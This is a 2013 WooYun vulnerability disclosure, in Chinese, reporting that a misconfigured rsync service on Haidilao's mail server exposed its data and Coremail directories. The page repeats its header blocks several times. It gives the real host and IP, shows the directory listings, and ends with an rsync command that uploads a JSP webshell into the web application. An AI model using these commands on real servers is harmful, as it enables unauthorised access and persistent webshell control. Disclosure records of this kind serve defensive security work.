海底捞邮件系统配置不当可shell | wooyun-2013-041227| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-041227

漏洞标题：海底捞邮件系统配置不当可shell

漏洞作者： ifelse

提交时间：2013-10-28 11:57

修复时间：2013-12-12 11:57

公开时间：2013-12-12 11:57

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-10-28：细节已通知厂商并且等待厂商处理中
2013-10-28：厂商已经确认，细节仅向厂商公开
2013-11-07：细节向核心白帽子及相关领域专家公开
2013-11-17：细节向普通白帽子公开
2013-11-27：细节向实习白帽子公开
2013-12-12：细节向公众公开

简要描述：

由于配置不当，可导致直接获得shell

详细说明：

124.127.49.65 mail.haidilao.com

root@bt:~# rsync mail.haidilao.com::
data           
mysql          
coremail       
root@bt:~# rsync mail.haidilao.com::data
drwx------        4096 2013/10/25 03:50:09 .
-rwx------           4 2013/10/25 11:55:26 cm_seed.data
drwx------        4096 2012/11/29 15:53:05 00
drwx------        4096 2012/11/29 16:40:27 batch
drwx------        4096 2012/11/29 16:40:27 cleanup
drwx------        4096 2012/11/29 16:40:28 lost+found
drwx------        4096 2013/07/19 06:45:29 mysql
drwx------        4096 2012/11/29 16:55:58 netfolder
drwxr-xr-x        4096 2013/10/25 03:57:18 newdisk
drwx------        4096 2012/11/29 16:55:58 search
drwx------        4096 2012/11/29 17:20:31 ud
root@bt:~# rsync mail.haidilao.com::coremail
drwx------        4096 2013/02/22 22:32:05 .
-rw-------         212 2012/06/27 03:55:37 .bash_history
-rw-r--r--          33 2011/08/29 04:22:35 .bash_logout
-rw-r--r--         176 2011/08/29 04:22:35 .bash_profile
-rw-r--r--         124 2011/08/29 04:22:35 .bashrc
-rw-r--r--         515 2011/08/29 04:22:35 .emacs
lrwxrwxrwx          26 2012/11/18 22:47:57 .my.cnf
-rw-------         568 2012/06/27 01:44:22 .viminfo
-rw-r--r--         658 2011/08/29 04:22:35 .zshrc
-rw-r--r--       46939 2012/10/19 03:33:44 1.txt
-rw-r--r--     5561643 2011/05/13 05:28:00 cm4.0.0_api_adv_RHEL4_x86_32.tar.gz
-rw-r--r--   143825549 2011/05/19 14:45:49 cm4.0.0_clamav_RHEL4_x86_32.tar.gz
-rw-r--r--    13747946 2012/11/08 22:14:41 lib.tgz
drwxr-xr-x        4096 2011/08/29 04:22:35 .mozilla
drwxr-xr-x        4096 2013/03/01 02:33:41 bin
drwxr-xr-x        4096 2013/10/15 02:15:16 conf
drwxr-xr-x        4096 2013/07/19 06:46:04 gateway
drwxr-xr-x        4096 2012/11/12 21:25:15 install
drwxr-xr-x        4096 2012/11/27 13:59:23 java
drwxr-xr-x        4096 2012/11/21 22:18:24 lib
drwxr-xr-x        4096 2013/01/01 02:12:07 libexec.0101
drwxr-xr-x        4096 2013/01/01 02:12:07 libexec
drwxr-xr-x       28672 2013/10/27 10:55:00 logs
drwxr-xr-x        4096 2012/05/21 07:12:56 mysql
drwxr-xr-x        4096 2011/08/29 12:08:12 sbin
drwxr-xr-x        4096 2012/11/28 06:53:11 tsc
drwxr-xr-x        4096 2013/10/27 10:45:26 var
drwxr-xr-x        4096 2011/08/29 04:24:10 web

漏洞证明：

上传shell
rsync /root/shell.jsp mail.haidilao.com::coremail/web/webapp/

修复方案：

http://drops.wooyun.org/papers/161

版权声明：转载请注明来源 ifelse@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2013-10-28 12:35

厂商回复：

您好，感谢您提报的漏洞细节，我们已经通知工程师修复该漏洞；

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-041227

漏洞标题：海底捞邮件系统配置不当可shell

相关厂商：haidilao.com

漏洞作者： ifelse

提交时间：2013-10-28 11:57

修复时间：2013-12-12 11:57

公开时间：2013-12-12 11:57

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ifelse@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-041227

漏洞标题：海底捞邮件系统配置不当可shell

相关厂商：haidilao.com

漏洞作者： ifelse

提交时间：2013-10-28 11:57

修复时间：2013-12-12 11:57

公开时间：2013-12-12 11:57

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-041227"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ifelse@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：